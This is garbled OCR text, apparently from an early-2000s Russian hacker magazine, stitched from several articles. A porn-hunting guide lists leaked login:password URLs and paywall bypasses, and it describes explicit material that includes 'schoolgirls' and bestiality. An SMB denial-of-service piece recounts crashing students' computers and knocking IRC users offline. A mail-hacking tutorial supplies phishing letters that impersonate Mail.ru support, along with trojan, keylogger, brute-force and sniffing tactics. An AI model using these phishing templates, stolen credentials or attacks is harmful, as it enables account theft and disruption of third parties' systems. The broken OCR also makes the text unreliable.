ний типа «Арткомса» (www.artcoms.ru) и размеру сайтов по теме 
(www.wireless.ru), истинно верен второй вариант. Просто компании, при- 
меняющие эту технологию в работе и быту, не очень-то хотят афиширо- 
вать свое добро для масс хаксоров. Так что мы обязательно продолжим 
тему ворчокинга в ближайших номерах, только искать будем в элитных 
кварталах и офисных зданиях. А пока на это у нас не хватило ни сил, ни 
времени (одного бензину сожрали литров сорок :6). И если ты вдруг ока- 
зался свидетелем работы беспроводной сети - срочно стучись к нам, бу- 
дем расследовать. А пока я шерстю Юзнет в поисках намеков на радио- 
эзернет, Федор паяет уникальный усилитель сигнала, а дальний родствен- 
ник Саламандры обещает замутить нехилую выносную антенну из короб- 
ки Принглсов. Солнце греет, жизнь кипит, присоединяйся! 
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| | = | [= © [= Любая особь мужского или женского пола, подключенная к 
Интернету, смотрит порнуху. Этот факт даже не хочу обсуж- 


ПОРНО 


творческий процесс поиска 


дать. Конечно, большинство интернетчиков будет орать, что 
это им не интересно, что у них нет на это времени и что 
они предпочитают живьем. Но бешенные рейтинги порноре- 
сурсов, их регулярное обновление, банерные сети говорят за 
интернетчиков: «порнуху любят почти все, а те, кто не любят, 
все равно ее смотрят». 


Любитель порнушки 


В том, что ты и все твои знакомые интернетчики и интернетчицы глядят 
порно, мы убедились. Раз уж это так, то давай учиться легко добывать мно- 
го качественного порно и не попадаться в порноловушки! К сожалению, 
большинство любителей порнушки так и не научилось добираться до само- 
го сладенького! Я научу, приступим. 


ЧТО ТАКОЕ ХОРОШЕЕ ПОРНО? 


СЕРИИ 

Большинству любителей сладкого достается обычно коктейль для онаниз- 
ма в виде кучки совершенно разных картинок с совершенно разными пор- 
ноактерами. Так быть не должно, любая порнушная картинка, которую ты 
слил с Интернета, - это сериал. То есть сначала дяфчонки-школьницы оде- 
ты и гуляют по улице, потом они знакомятся с парнями, потом парни их раз- 
девают и только потом начинают их иметь в десяти различных позах, ну ив 
конце все обязаны кончить дяфчонкам на лица. Вот примерное описание 
стандартной порносерии. Одни любят лесбиянок, другие групповики, тре- 
тьи прутся просто от больших сисек. Главное, что все это должно быть в ви- 
де серии связанных фотографий. То есть у любителя порнушки должна 
быть возможность рассмотреть происходящее со всех сторон. 


ЛИЦА 

Если дяфчонка снялась в одной порносерии, то она обязательно снялась 
еще в нескольких. Стало быть, у порнофила должна быть возможность по- 
смотреть на одну и ту же понравившуюся порноактрису в разных сериях. 


КАРТИНКИ 

Картинки должны быть с предпросмотром, то есть вся серия должна гру- 
зиться на страничку в виде маленьких картиночек. Если порнушник захочет 
рассмотреть какую-то картиночку получше, то он кликнет на нее, и она 
должна увеличиться во весь экран. На многих отвратных сайтах такой воз- 
можности нет. 


КАТЕГОРИИ 

Как я уже говорил, одни любят смотреть на лезби, другие на групповики, 
есть любители прикольной одежды типа чулков и обтягивающего латекса, 
одни любят женщин в соку, третьим подавай подростков, есть и грязные из- 
вращенцы, фанатеющие от трансвеститов, мутантов, карликов, жестокого 
пирсинга, садомазохизма, от мазанья калом и секса с собачками, лошадьми, 
удавами, козочками. Одним словом, на вкус и цвет товарищей нет. Но долж- 
ны быть сайты, где все это безобразие разложено по категориям. Причем в 
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каждой категории должно быть несколько серий с предпросмотром, а нету- 
пая свалка разных несвязанных фоток. 


ВИДЕО 

Если у тебя Интернет не халявный, то видео качать экономически не оправ- 
дано. Допустим, на 15 мегабайт трафика ты потратишь минимум полтора 
доллара - что на выделенной линии, что на модеме. Намного умнее будет 
найти в Интернете кадры из фильма, который тебе понравится, и пойти ку- 
пить видеокассету за 30-80 рублей. 

Поэтому на хороших сайтах видео хранится с предпросмотром. Естествен- 
но, в видео должен быть звук, должна быть возможность скачать отдельные 
эпизоды с предпросмотром или весь фильм целиком. На хороших сайтах 
есть возможность посмотреть фотографии, сделанные во время подготовки 
к съемке. Например, ты можешь увидеть, как порнозвезда готовится к пене- 
трированию или отдыхает после него. А еще видео в Интернете обычно 
сильно пожато, поэтому полезно, когда на сайте есть отдельные кадры в ви- 
де картинок, которые позволят тебе все нормально разглядеть. 
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Вот что ты должен требовать OT порносайтов. Ты думаешь, что это сказки и 
нет таких идеальных сайтов? Есть такие сайты, просто туда нужно научить- 
ся попадать и нужно научиться с ними бороться. Я научу! 


ПЛАТНЫЕ САЙТЫ 


Почему-то многие свято верят в то, что платные сайты соответствуют высо- 
ким требованиям любителя порнушки. Далеко не все. Вообще, я видел 
очень мало нормальных платных порносайтов. Конечно, первая страница у 
многих таких сайтов очень привлекательна, но как только ты становишься 
зарегистрированным пользователем, то сразу все падает. Контент обычно 
просто отвратителен. 

Ни в коем случае не пытайся честно зарегистрироваться на порносайте, это 
просто глупо. Во-первых, порносайт может украсть все деньги с твоей кре- 
дитки, во-вторых, ты сможешь легко найти в Интернете его содержимое 
бесплатно. 

Но если тебе все-таки хочется на хороший платный порносайт, то можно по- 
пытаться на него залезть бесплатно. Можно, конечно, пытаться хакнуть сайт 
или пытаться зарегистрироваться по фальшивой кредитке, но эти способы 
нельзя назвать легкими. Поскольку очень хорошие (а нам нужны именно та- 
кие) платники хачат все, кому не лень, у них отличная защита, а если ты зай- 


мешься кардингом, то могут быть проблемы с законом. Другое дело - найти 
совершенно легально в Интернете готовый пароль к платному порносайту. 


САЙТЫ ПАРОЛЕЙ 


Конечно, ты уже видел в Инете гигантские списки паролей к платникам, и не 
один He работал. Hy аты как думал? Редкий пароль живет дольше двух дней, 
его сразу прикрывают. Поэтому смотри на дату выпуска листа с паролями. 
Должно стоять сегодняшнее число. Методика поиска такая: набираешь в по- 
исковой системе строку типа «pass BangBus.com». Никаких ламерских «pass 
sex». Ты должен себе четко представлять, пароль к какому платному сайту 
тебе нужен. Платный сайт мечты найти легко, его адрес пропечатан на тво- 
их любимых порнокартинках. Эти картинки кто-то свистнул с сайта, который 
тебе нужен, там ты найдешь еще много того, что тебе нравится. 

Желательно в запросе указать сортировку по дате, чтобы тебе вывалились 
самые свежие пароли. Ни в коем случае не кликай на ссылки, которые вы- 
дала поисковая машина, тебе не нужно никуда ходить. Нужно искать паро- 
ли прямо в результатах поисковой машины, находим ссылку http://sami- 
lies:volume@members.bangbus.com/. Здесь зат ез - это логин, а volume 
- пароль. Ссылку нужно скопировать в новое окно браузера. Эх! Этот пасс 
уже не работает! Ищем дальше... И ничего не находим, нет сегодня свежих 
паролей для этого прикольного сайта, все пароли не подходят. 


Но не расстраивайся, ведь рядом вываливается куча других полезных паро- 
лей, например, свеженький: http://dezamone:b5kcotd@www.blackson- 
blondes.com/membersarea/index.html. Это тоже прикольный сайт, тут не- 
гры дружно имеют белых школьниц. Прикольное видео, правда без пред- 
просмотра. Словом, чтобы ломиться на платные сайты через поисковую ма- 
шину, нужно иметь список добротных платных сайтов. Часть паролей най- 
дется, а часть нет. Поэтому во время поисков нужно найти несколько на- 
дежных сайтов с паролями. 

Сайтс паролями должен часто обновляться и иметь систему выброса нерабочих 
пассвордов. Идеал для подражания сайт http://212.108.226.145/ 
furesz/index2.htm. Он обновляется 2-3 раза в неделю, тут паролей не много, но 
большинство из них работает. При этом нет никакого обмана. 

А вот сайт паролей http://www.qualitypasswords.com/ - пример нечестно- 
го сайта. Там под многие ссылки с паролями засунута реклама. Отличить 
очень просто: наводишь на ссылку и сморишь, куда она тебя отправит. 
http://www.qualitypasswords.com/cgi-bin/cjpro/cjproout.cgi?scam - 
подстава, это реклама. http://digger:robot@www.asiandeception.com/ 
secure/ - реальная ссылка C паролем и логином. 


САЙТЫ C БЕСПЛАТНЫМ СОДЕРЖИМЫМ 


Иногда становится смешно, что за такие уродские сайты кто-то платит, кто- 
то пытается добыть от них пароли, когда есть мегапорталы с классной бес- 
платной начинкой. Эти порталы хорошо известны: 
http://www.sleazydream.com/main.html 
http://www.discretesex.com/main.html 

http://www.germanhard.com/ 

Такие сайты живут за счет рекламы. Они делают себе хорошую посещае- 
мость за счет того, что, якобы, ежедневно обновляются. Вообще-то, тут и 
так куча отличных серий - обонанируешься, но если тебе этого мало, то 
можно легко похачить. 

Дело в том, что на таком сайте валяется около тысячи галерей, а доступны 
с предпросмотром только несколько десятков. Причем каждый день откры- 
вается пара новых галерей, а пара старых закрывается. Если ты чуть-чуть 
подумаешь, то сможешь получить доступ ко всем галереям сайта. 
Например, заходим в открытую серию http://www.sleazydream.com/ 
09y/index.html. Легко догадаться, как попасть в закрытые галереи, надо Ha- 


ЛЕГКОЕ ПОРНО 
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брать http://www.sleazydream.com/09a/index.html, http://www.sleazy- 
dream.com/09b/index.html и так далее. Это работает со всеми такими сай- 
тами. 

Кстати, это поможет тебе не попадаться на рекламу. Понятно, что на сайте 
http://www.discretesex.com/ галерея с адресом http://karadavis.com/ 
4videosamples/46h/asakid.htm - реклама платного сайта. 


САЙТЫ СО ССЫЛКАМИ НА БЕСПЛАТНОЕ СОДЕРЖИМОЕ 


Дело в том, что на многих хороших платных сайтах есть галереи с бесплат- 
ным содержимым, это нужно для рекламы. Но самое смешное в том, что 
обычно в этих бесплатных галереях лежат почти все серии платника в не- 
много урезанном варианте. На специальных сайтах бесплатных галерей вы- 
кладываются ссылки на одну из этих серий. Используем ту же логику: если 
у нас есть ссылка на галерею http://www.oralaudition.com/ cofh/cos- 
tume3/, то работает и http://www.oralaudition.com/cofh/costume2/ с 
другой галереи. Таким способом можно набрести на мегамассив качествен- 
ного порно (около 800 серий). 

Осталось найти хорошие сайты с такими ссылками. Сайт http://www.hot- 
sexseries.com/main.html - это отличные ссылки с предпросмотром. Рекла- 
ма попадается, но ее легко отличить. Сайт http://www.hardcorejunky.net/ 
links2.html - это честные ссылки без рекламы с прикольным текстовым 
описанием. 

A вот сайт http://www.easy-porn.net/ - сплошная подстава. Хотя выглядит 
привлекательно, все ссылки там в виде http://www.easy-porn.net /count- 
ing.php?id=177707&part - сплошная реклама. А сайт http://www.only- 
teenstgp.com/ можно обмануть. Чтобы он не выдавал рекламу, нужно из 
его ссылки 
http://www.onlyteenstgp.com/cgi-bin/tt.cgi?url=http://www.xxxjun- 
gle.net/toons/xm92/pinup3.htm&link=p01.13 1.11483 16967644963133 
169778491&p=0 вырезать нужный бесплатный адрес http://www.xxxjun- 
gle.net/toons/xm92/pinup3.htm и наслаждаться. 


ПОИСК ПО ИМЕНАМ 


И напоследок еще один прикольный способ обломать платные серваки и 
найти их платную начинку на бесплатном сайте. Многие платники любят 
рекламировать, что, мол, только у них есть такая замечательная порнозвез- 
да. Расслабься, в бесплатном Интернете есть почти все серии с известными 
порнозвездами, нужно только уметь их искать. Для этого есть специальные 
сервера типа http://www.freeones.com/. Например, понравилась тебе 
дяфчонка по имени Krystal Steal, но, чтобы ее подробно разглядеть, сайт 
требует денег. Заходим на http://www.freeones.com/, вводим ее имя и по- 
лучаем список с бесплатными галереями. Ну и, конечно, ссылку на ее плат- 
ный официальный сайт, к которому можно найти пароль. А самое смешное, 
что все серии, которые обещал платный сайт, мы уже нашли бесплатно. 


ЗАЩИТА 


Эти все методы можно эффективно и безопасно использовать, если у тебя 
нормальный браузер, в котором действительно можно отключить Java, JS, 
ActiveX, cookies. Я использовал Opera v. 6.03. Правда, если ты будешь ла- 
зить по платникам с чужим паролем, то придется включать куки. 

Кстати, если хочешь проверить свой Explorer на безопасность, залезь на 
http://www.easy-porn.net/ и покликай ссылки. Всплывет куча окон, мно- 
го дряни прописывается в реестр. Например, они умеют записывать в до- 
машнюю страницу браузера порносайт так, что ты не сможешь его удалить. 
Осторожно, скачка порнухи без хорошей защиты опасна для здоровья тво- 
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КАК УСТРОЕНЫ ДЕВЧОНКИ 


Давай-ка разберемся, в чем фишка нашего нового друга. А то запускать 
нюкер, не представляя, что он делает с удаленной системой, - это, во-пер- 
вых, неинтересно, а во-вторых, как-то по-гопницки :). Из названия понят- 
но, что он пролезает через уязвимости (как меня прет это словечко баг- 
трекров :)) в технологии SMB, в узких кругах известной как Server Message 
Block. Эта пижня фактически заменяет NetBIOS в №Тшном семействе вин- 
дов, то есть предоставляет по сети доступ к расшаренным файлам и прин- 
терам. Работает она через TCP/IP, что, в принципе, должно было добавить 
надежности, но... 

Служба блока сообщений сервера занимается мониторингом 139-го и 
445-го портов в надежде получить запрос на пользование шарой от изму- 
ченного лишениями удаленного юзера. А так как процесс посылки этого 
запроса не требует никакой аутентификации, под юзера может легко за- 
косить и злобный хацкер. Ему необходимо зашвырнуть в порт SMB пакет 
SMB_COM_TRANSACTION, в котором, по идее, должны лежать функции, 
обязательные к выполнению для расшаренного ресурса. А в сгенеренном 
нюкером пакете лежат запросы к трем функциям системы: 
NetServerEnum2, NetServerEnum3 и NetShareEnum (эти функции обраба- 
тывает LANMAN КАРТ). Права юзера машины нужны только для ShareEnum, 


ВНУКИ НЮКА 


остальные функции легко выполняются анонимно. В итоге мы получаем 
стандартный Дос с последующим синеньким экранчиком. 


ИМЕЕМ ПРАВО? 


Какие системы пасуют перед самбамдаем? Во-первых, это виндюки 
НТшного семейства. Учитывая дату релиза эксплойта и эксперименталь- 
ные данные (об этом позднее), в список жертв можно смело поставить 
WinNT, Win2K SP2 (!) и WinXP. Соответственно, нюку подвержены все, кро- 
ме самых убогих и несчастных, то бишь упорно юзающих 9х/МЕ (для них 
мы припасли другой подарочек :)). Неплохо? Тогда второе ограничение - 
на компах должна быть включена поддержка шар, если она отключена, 
мазы задосить уже нет. Так что продвинутых юзеров на модеме отметаем 
(кто снял галки с «клиента сетей Microsoft» - тот молодец). Так что круг 
заметно сузился, и основная масса жертв оказалась заложниками лока- 
лок. Они, конечно, могут подстраховаться и забить в реестр параметр 
«HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Control\ Lsa\ restric- 
tanonymous=00000002», который заставит винду требовать у подозри- 
тельных личностей логин и пароль для доступа к компу, только совсем не 
факт, что они будут этим заниматься (ведь особо продвинутых мы уже вы- 
черкнули из списка :)). 


ТЕСТИНГ НА СЕБЕ 


Надо сказать, что при тестировании я почувствовал гордость за то, что 
несу на себе тяжкий крест ВИНформатора. Мой комп настолько отчаян- 
но сопротивлялся попыткам нюка с обеих сторон, что на борьбу с ним 
я потратил больше времени, чем на написание этого текста :). Так вот, 
когда я захотел развлечь себя нюканьем локалхоста, первым завопил 
верный DrWeb. Хорошо, отрубаем вирусную базу за август, молчит. За- 
пускаю нюк, а он мне нагло заявляет «Cannot connect». Сопеть-копать, 
я ж файрволл не отрубил. Ставлю дизейбл любимому Нортону, повто- 
ряю попытку - та же фигня. Лезу в настройки соедине- 
ния и вспоминаю, что давно и надолго запретил все 
виды шар. Тяжелой рукой клацаю по мышке и раз- 
решаю их. Безо всякой надежды на лучшее запу- 
скаю нюк и... умираю. Причем сразу :). Хвалю 
себя за то, что еще не поставил SP3 (представ- 
ляю, как бы я его удалял :)), и иду тестить в род- 
ной универ. 


ТЕСТИНГ НА СТУДЕНТАХ 


Сразу скажу - это было неинтересно :). Сидишь себе и меняешь 
порядковый номер и айпишник на единичку вверх, да жмакаешь 
«Убить». А умирали все, и винтукеи, и хрюшки, не успев даже пискнуть. В 
какой-то момент мне стало жалко, что я не нашел реализации этого нюка, 
работающей из командной строки - можно было бы замутить неплохой 
батничек, обесточивающий весь универ :). На прощанье ДоСнув сотр- 
classes (так зовется наш сервак, отвечающий за связь аудиторий между 
собой, вроде маршрутизатора), я покинул это заведение и отправился в 
инет-кафе. 


ТЕСТИНГ НА ЛЮДЯХ 


Да-да, студенты - это не люди :). Поэтому пришлось лезть в ИРКу и искать 
себе подходящих друзей :). Следуя вековым традициям, дестрой был уст- 
роен в далнетовском #Sex (скоро это место станет культовым, и там пове- 
сят мемориальный баннер - «Здесь в 2002-ом году развлекались редакто- 
ры Спеца» :)). Жалко, что народу там было мало, но троих я честно выки- 
нул (не может не радовать тот факт, что у одного из них перед ником сто- 
яла кракозябра опа). Если бы не боты, то на далнете запахло бы захватом 
канала, но эти киберсволочи сидели на юниксовом серваке. 


В ИТОГЕ 


Приходится констатировать, что WinNuke не просто вернулся - он клево 
реинкарнировался :). В прошлой жизни ему не удалось просуществовать 
долго, а вот теперь... Учитывая специфику непродвинутых пользователей, 
сервиспаки их только пугают, а слухи о том, что 2К и ХР - очень надежная 
система, погружают несчастных в состояние полного спокойствия. Даже 
те из них, кто додумался поставить файрволл, все равно не будут защище- 
ны, если тусуются в локалке (конечно, можно создать правило, разреша- 
ющее входящее соединение только от внутренних адресов сети, но какой 
ламер будет этим заниматься? :)). A если поиметь в арсенале еще и IGMP- 
нюкер для жертв, сидящих под 9х/МЕ, то вполне можно стать этаким ки- 
бербогом. Или, в крайнем случае, демоном, вершащим свое кровавое пра- 
восудие :). 


ar 
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как завладеть чужим 


аккаунтом 


Хрым7 (hrimz@xyligan.ru 


Если сейчас в Инете в любом поисковике ввести «взлом почтового ящи- 
ка», то на тебя упадет куча ссылок на одну и ту же статью, лежащую на 
разных «хакерских» сайтах. Не любит народ у нас думать, ведь намного 
легче copy&paste” нуть чье-нибудь другое творение. Да и у других перцев 
в статьях чаще всего описывается только один способ взлома. Не спорю, 
это тоже полезно, но все-таки нужно подвести окончательные итоги по 
этому вопросу. Этот туториал и представляет собой эти самые итоги. Все 
описанные способы рабочие, но, прежде чем что-то ломать, подумай голо- 
вой и выбери, что лучше всего заюзать конкретно в твоем случае. Я имею 
в ВИДу ТО, ЧТО не надо присылать мне письма такого плана: 

«Я хотел взломать мыло boss@fbi.gov, мне никак не удается заставить ад- 
мина прислать пароль. Ваша статья полный аЦтой!» :). Ну все, хватит ли- 
рики, пора приниматься за дело. 


НЛП 


Самый известный и, наверное, самый старый способ заключается в пере- 
программировании мозга админа или юзера. Я все рассмотрю на конкрет- 
ном примере. Примерно полгода назад мне было очень нужно получить 
доступ к ящику одной дефчонки - french_lover@mail.ru. Не долго думая, 
я зарегил себе ящик mail_support@mail.ru (да, он оказался свободен!) и 
с него уже написал письмо такого вида: 


From: mail_supportdmail-ru 
To: french_loverdmail-ru 
Tema: Служва mexHuYeckou поддержки Mail-RU 


Уважаемый пользователь french-lover! 

Om лица нашего интернет-холдинга Mail-RU мы 
просим извинения за причинение вам некоторых 
неудовств - 

В связи со сменой нашего оборудования Ha 
Более новое нам нужно перенести всю 
пользовамельскую информацию на новые жесткие 
диски. Соответственно просим повторно 
прислать некоторую информацию о своем 
аккаунте. Это нужно для предотвращения 
всякого рода ошибок и неточностей- Просто 
пришлите по адресу та! 1 _зиррогЕта1 1 .кги 
письмо с таким форматом: 

Login: 

Password: 

Password (еще раз): 

Uma: 

Pamuauan: 

СпасивБо за помощь. Все эти временные 
неудобства только от moro. что мы хотим 
увеличить качество и скорость равомты с нашей 
почтовой системоц. 


С уваженцем- 
администраторы 
интернет-холдинга Mail-RU- 


Хочешь - верь, хочешь - нет, но уже через три часа я читал почту фран- 
цузского любовника (точнее - любовницы). Для большей достоверности 
просто напиши какое-нибудь письмо в настоящую службу поддержки 
сервака, на котором весит ящик-жертва, чтобы узнать, какого формата 
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Приветствую тебя! Пришла пора разложить по полочкам все, 
что касается относительно занятной темы - взлому 
электронного почтового ящика ака мыла. Способов 
существует уйма, но мы рассмотрим самые известные. Ведь 
ты парень смышленый - в случае чего, сам что-нибудь 
придумаешь :). 


рис. Борис Алексеев 


они используют письма (имеется в виду обращение к пользователю, 
подпись и т.д.). 

Это все было о проверке на лоханутость пользователя, теперь займемся 
админом. Тут для начала нужно надыбать как можно больше личной инфы 
жертвы. Такой, как ФИО, адрес е{с. Все это можно найти через асю, на до- 
машней странице ламера (если есть), или, например, введи в поисковике 
мыло - наверняка выпадут линки на всякие форумы, где он по неосторож- 
ности мог засветить свой private information. Далее заводи на каком-ни- 
будь другом серваке левое мыло и через веб-интерфейс пиши кляузу, что, 
типа, какой-то хацкер поимел твое мыло и выдает себя за тебя. В качест- 
ве подтверждения свети частной инфой жертвы. Если раз 6-7 отписать 
письмо в службу поддержки, могут и прислать пароль. Например, финт 
проходил на апортовской почте. 


Примечание от Дронича: 


Просить сразу пароль, ИМХО, это моветон. Осталось очень мало ламья, го- 
тового выслать пароль по почте. А вот расстаться с ответом на «секретный 
вопрос» им психологически гораздо проще. Лично я имел мыла достаточ- 
но продвинутых юзеров простым письмецом (все имена изменены во 
избежание): 


From: 014та11 Password Support Service <pass- 
word-supportdoldmail-ru> 

То: много кому слалось. . - 

Тема: ВНИМАНМЕ! ПроБлемы с авторизацией на 
сервере «Старой Почты» 


Уважаемый пользователь! 


В связи с переходом сервера на новое 
программное обеспечение Были открыты некие 
уязвимости в системе Безопасности. Мы не 
можем точно сказать- Были ли повреждены или 
несанкционированно прочитаны Bawu 
персональные файблы- поэтому просим Вас 
ответить на это письмо по приведенному ниже 
формату. Если у Вас возникнут провлемы с 
написанием данного письма- ответьте на эмо 
письмо. указав в meme слово «help». и morga 
наша служа вышлем Вам неоБходимые инструкции 
и форму для заполнения. 


ВНИМАНИЕ ! 

Если om Вас не поступит ответа на это пчсьмоз 
а почтовый траффик по Вашему пользователю 
Будет поступать- 019Ма11 оставляет за совой 
право на отключение и удаление Вашей учетной 
записи - 


DAA корректного ответа удалите все строки 
письма (включая эту) и запишите в первой 


строке ответ на Ваш секретный вопрос. 


Ваш вопрос: Ваше прозвище в школе? 


Спасчво за MO. что пользуетесь услугами 
«Старой Почты». 


Результативность такого письма почти стопроцентная (канало не только 
на известном OldMail'e), хотя кое-кому приходилось высылать и красивую 
НТМЕ-формочку для заполнения. Так что запомни правило: загрузить, 
припугнуть, показать авторитетность (видишь, я даже твой секретный во- 
прос знаю, значит я - админ :)). А посмотреть секретный вопрос в наст- 
ройках - это совсем не проблема :). 


ТРОЯНЫ 


Троянские кони - главный козырь Mail-xakepa. Это не самый надежный 
способ получить заветный пароль, но попробовать стоит обязательно. 
Под каким-нибудь предлогом заставь ламера запустить твой Service Pack 
2 для WindowsXP весом в 30 Кб :), и все будет пинцетно. 06 одном из 
способов впаривания троянов, кстати, написано в этом же номере. Да- 


лее, после всех махинаций, подрубайся клиентом к серверу и качай се- 
бе на винт все файлы нужного аккаунта из директории почтовой про- 
граммы. У себя на машине копируй все это добро в свою «почтовую» ди- 
ректорию (если у юзера не стандартный почтовик - поставь себе такой 
же), затем в настройках та-проги можно заценить пароль в виде звез- 
дочек. Это лечится программа типа OpenPass (валяется на freeware.ru, 
но учти, она пашет только под Win9x, для ИксПи нужно что-то другое). 
При стечении некоторых обстоятельств может прокатить и этот способ. 
Экспериментируй! 


БРУТФОРС 


Тоже популярный метод взлома почты, и тут есть 100% возможность хотя 
бы попробовать реализовать этот метод. Брутфорс - это так называемый 
грубый взлом, который заключается в прямом переборе паролей. Для это- 
го нужно поставить саму bruteforce-npory и скачать хороший словарь с 
паролями. Хороший - это мегов на 20 :). Но даже с таким большим слова- 
рем есть крупная вероятность неудачи, так как пароль может быть не 
lamer (подбирается в течение пары минут), а, например, Ht@b75#57vZ 
(подбирается в течение примерно ста лет). Но все-таки чаще всего нео- 


MAIL HACKING 


пытные пользователи юзают пароли не очень-то мудреные. Так что стоит 
понадеяться и на это. 

Есть брутфорсеры, которые подбирают пароль удаленно, то есть подруба- 
ясь к рор-серваку жертвы, а есть такие, которые ломают локальные фай- 
лы. Например, файлы с паролями какого-нибудь конкретного почтовика. 
Но для второго случая нужно сначала реализовать пунктик под названи- 
ем «Трояны». Поэтому удаленный перебор - наш выбор! 


СНИФФЕРЫ 


Это сложноватый в реализации способ, но зато очень действенный. Сниф- 
финг - это перехват всего трафика или же фильтрация его специальными 
прогами на конкретно почтовые пароли. Но беда в том, что реально все 
это реализовать в Инете - большой напряг, а вот в локале - сколько угод- 
но. Есть, конечно, частные случаи, но редко так случается - удача не все- 
гда хочет быть рядом :(. Кстати, инфа к размышлению. В прошлом Спеце 
была статья о DNS Poisoning’ e. Это технология подмены DNS запросов, и 
если ты сможешь это реализовать и пользователь будет проверять почту 
через веб-интерфейс - пароль твой. НО! Большое но! Не забывай, что, 
кроме локального сниффера, можно поставить его на какой-нибудь уда- 
ленной тачке и радоваться жизни, ожидая момента Х (перехвата паролей, 
конечно же!). Будь уверен, он со временем настанет. Но для таких шало- 
стей нужен специфический Wenn, а бесплатные хостеры редко предостав- 
ляют такую вкуснятину. Возможно, придется потратить часть чужих (я 
этого не писал :) деньжат. 
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ШПИОНЫ 


Шпионские фильмы любят многие, а 
вот попробовать себя в качестве 


шпиона удается не каждому. Но ни- 
чего, это можно возместить компью- 
терным шпионажем. Для этого суще- 
ствуют специальные keylogger bI 
(ака клавиатурные шпионы). Их ос- 
новная задача - писать в файл все 
нажатия клавиш на клавиатуре юзе- 
ра. Потом этот файлик отсылается 
тебе на мыло либо забирается троя- 
ном, в общем, любым способом. Для 
того чтобы заставить ламера запус- 
тить твою клевую программу под на- 
званием internet_tweaker.exe, нужно 
тоже что-нибудь оригинальное при- 
думать. Уровень интеллекта средне- 
статистического ламера за послед- 
нее время немного поднялся, и по- 
этому воспользуйся своим самым 
главным органом на теле. Я имею в 
виду - головой (а ты что-то другое 
подумал?) :). Если и это не поможет, 
можешь просто попробовать напи- 
сать юзеру что-то вроде «Давай па- 
роль, сука! А то убью. Ногой» :-). 

Заметь, уже третий способ сводится 
к тому, что что-то нужно залить на 
вражескую машину, а это не есть 
9004, поэтому далее рассмотрим 
принципиально другие способы. 


КОНКРЕТНЫЕ ОБМЫЛКИ 


Вот тебе на растерзание не очень сложный способ взлома почтового ящи- 
ка. Тут главное, чтобы инфа была не очень старая и админы не успели по- 
фиксить уязвимость. Делаешь так. Заходишь на WWW.ya.ruU и в строке по- 
иска вводишь «взлом+тай.ги» (hotbox.com, rambler.ru). На большинстве 
известных почтовых серваков лежит много статей о взломе конкретных 
мыльников. Вообще-то, статьи эти чаще всего ламерские до жути, но, бы- 
вает, попадается реально толковая инфа. Соответственно, можно попро- 
бовать то, что в ней описано. Либо самому домыслить идею или, в случае 
неработоспособности дырки (админ, сволочь, прикрыл!), на основе мате- 
риала открыть новую. Иногда это тоже срабатывает. 

Не знаю уж, почему, но каждая якобы частная «хакерская» страничка ста- 
рается засунуть в раздел «Articles» статью типа «Взлом мыла на гат- 
bler.ru», которую уже прочитало полрунета :) на другом «элитном ресур- 
се». Главный минус этого способа - это то, что инфа во всех этих матери- 
алах частенько бывает устаревшая. 


ВАЛИМ СЕРВАНТЫ 


Самый сложный, но самый действенный метод - это взлом мыльного серва- 
ка. Да-да, я имею в виду порутить mail.ru :-). Ведь для настоящего хацкера 
нет преград, и если будет уж очень нужно - можно и это реализовать. Но это 
уже вряд ли входит в понятие философии Easy hacking :). Для того чтобы 
это провернуть, нужно иметь хороший запас знаний. А конкретнее - надоб- 
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но реально варить в протоколах, программировании, детальном устройстве 
ломаемой оси и куче всего еще. Чаще всего на почтовых серваках стоит 
*nix, а соответственно - Апача, а соответственно - sendmail, ну и так далее. 
Ведь любой mail-akkayHT представляет просто пользователя системы с 
очень ограниченными правами. А тебе нужно попробовать расширить эти 
права. Желательно до гО0Е`а :). Да, еще нужно позаботиться о грамотном 
заметании следов, своей анонимности и так далее. Зачем я вообще это пи- 
шу, если это тема не просто одной статьи, а мы уже несколько номеров об 
этом пишем :). Учиться, учиться и еще раз учиться - все, что можно посове- 
товать, если ты выбрал именно этот способ! 


BUGTRAQ 


Здесь я тебе дам совсем уже общие рекомендации о поисках багов в почто- 
вых серваках. Не волнуйся - они есть везде. Полазай по всяким securityfo- 
си5.сот, там просто вводи ххх.сот hacking (для танкистов - ххх - домен мы- 
ло-серванта) и вчитывайся. Да, если тебе, например, нужно поиметь hot- 
box.com, а ты нашел в багтраке описание уязвимости для Mail.com, то есть 
вероятность, что этот баг сработает и там. Админы ведь по всему миру оди- 
наковые :). В крайнем случае лезь в форумы, irc, etc. В соответствующих 
каналах тусуется народ, который может реально помочь с твоей проблемой. 
Бывает такое, что у кого-то был опыт поломки обмыльников с доменом, что 
и утебя, - почему тогда не поделиться опытом? Самый дерьмовый способ - 
это повестись на лажу, типа за 10 гринов поимею ящик Ha kKlya.ru и так да- 
лее. Если все-таки заинтересовался этим методом и у тебя есть webmoney- 
кошелек, полный буказойдов, или буржуйская креда, то зайди на борду Ha 
Ксакеп.ру - там таких предложений просто сотни. Но запомни, что это как- 
то не по-хакерски, по-моему. В любом случае, решать тебе. 


OUTRO 


Вот дочитал ты эту статью и уже готовишься поюзать все рассказанное 
для натягивания noah@real.xakep.ru :). Но не стоит горячиться - Рубен и 
ответить может :). Ладно, я Outro не для шуток писал, а для того, чтобы 
подвести некоторый итог и немного предупредить. Итог такой. При нали- 
чии знаний и желания возможно натягивание любого ящика. Главное, 
чтобы соображалка варила в нужном направлении. Здесь я специально 
не стал все писать настолько подробно, что и времени подумать не оста- 
лось. Только общие рекомендации. А вот куда, какую инфу в Brutus” e вво- 
дить - уже сам догадывайся :). Ведь хакерство - это не тупое выполнение 
описанного в журнале. Каждая статья является своеобразным толчком 
для того, чтобы ты полез в документацию, исходники, начал изучать все 
на примерах. Намек воспринят без наезда, надеюсь? Короче, удачи, и пи- 
ши о своих способах натягивании почтовиков - всегда интересен чужой 


экспириенс. hrimz@xyligan.ru - ждет твоих мессаг. Еще увидимся! 


== 
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Для этого необходимо: 


1. Заполнить подписной купон (или 
его ксерокопию). 


2. Заполнить квитанцию (или 
ксерокопию). Стоимость подписки 
заполняется из расчета 100 рублей 
за 1 журнал. В стоимость подписки 
включена доставка заказной 
бандеролью. 


3. Перечислить стоимость подписки 
через Сбербанк. 


4. Обязательно прислать в 
редакцию копию оплаченной 
квитанции с четко заполненным 
купоном 

или по электронной почте 
subscribe_xs @ gameland.ru 

или по факсу 924-9694 (с 
пометкой "редакционная подписка"). 

или по адресу: 

103031, Москва, Дмитровский 
переулок, д 4, строение 2, 
ООО "Гейм Лэнд" (с пометкой 
"Редакционная подписка“). 


Рекомендуем использовать 
электронную почту или факс. 


